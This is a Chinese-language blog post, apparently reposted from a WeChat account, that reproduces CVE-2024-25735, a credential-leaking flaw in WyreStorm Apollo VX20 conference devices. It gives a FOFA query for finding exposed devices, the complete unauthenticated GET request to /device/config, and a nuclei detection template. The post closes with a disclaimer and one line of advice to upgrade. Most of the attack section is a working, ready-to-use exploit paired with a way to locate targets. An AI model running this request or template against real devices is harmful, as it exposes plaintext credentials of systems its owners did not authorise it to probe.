CVE-2024-25735漏洞复现（附POC）

admin

102369
文章

87
评论

2024年3月6日08:34:24评论126 views字数 1147阅读3分49秒阅读模式

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

—

漏洞名称

WyreStorm Apollo VX20 信息泄露漏洞

—

漏洞影响

WyreStorm Apollo VX20 < 1.3.58

CVE-2024-25735漏洞复现（附POC）

—

漏洞描述

WyreStorm Apollo VX20是一款优质的音视频会议一体机，专为企业办公室和会议室空间设计。这款设备集成了摄像头、麦克风、扬声器及投屏功能，为企业办公和视频会议提供优质的视听体验。该系统存在信息泄露漏洞，未经授权的远程攻击者可以获取明文凭据。

—

FOFA搜索语句

icon_hash="-893957814"

CVE-2024-25735漏洞复现（附POC）

—

漏洞复现

该漏洞是get请求，可以直接使用浏览器访问

CVE-2024-25735漏洞复现（附POC）

完整POC数据包如下

GET /device/config HTTP/1.1Host: 192.168.40.130:115User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

CVE-2024-25735漏洞复现（附POC）

漏洞复现成功

—

nuclei poc

poc文件内容如下

id: CVE-2024-25735

info:  name: WyreStorm Apollo VX20 信息泄露漏洞  author: fgz  severity: high  description: |    WyreStorm Apollo VX20是一款优质的音视频会议一体机，专为企业办公室和会议室空间设计。这款设备集成了摄像头、麦克风、扬声器及投屏功能，为企业办公和视频会议提供优质的视听体验。该系统存在信息泄露漏洞，未经授权的远程攻击者可以获取明文凭据。  metadata:    verified: true    max-request: 1    vendor: WyreStorm    product: WyreStorm Apollo VX20    fofa-query: icon_hash="-893957814"  tags: cve,cve2024,aiohttp

http:  - method: GET    path:      - "{{BaseURL}}/device/config"

    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body,'password') && contains(body,'softAp')"

—

修复建议

升级到最新版本。

原文始发于微信公众号（AI与网安）：CVE-2024-25735漏洞复现（附POC）

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2024-25735漏洞复现（附POC）

二次注入简单介绍

CVE-2024-2389 命令执行漏洞(附EXP)

CVE-2024-4040 CrushFTP 中的身份验证绕过和任意文件读取

利用 PUT 方法导致三星远程代码执行 (RCE)

泛微E-Mobile 6.0 client.do 命令执行漏洞

【在野0day】某友CRM系统某接口存在任意文件下载（大量资产存在）

【漏洞复现】短视频矩阵营销系统 ajax_uplaod接口处存在任意文件上传

漏洞速递 | Microsoft微软最新RCE漏洞（附EXP）

通达OA down 未授权员工信息泄露漏洞

漏洞预警 | FFmpeg释放后使用漏洞

发表评论

在线咨询

微信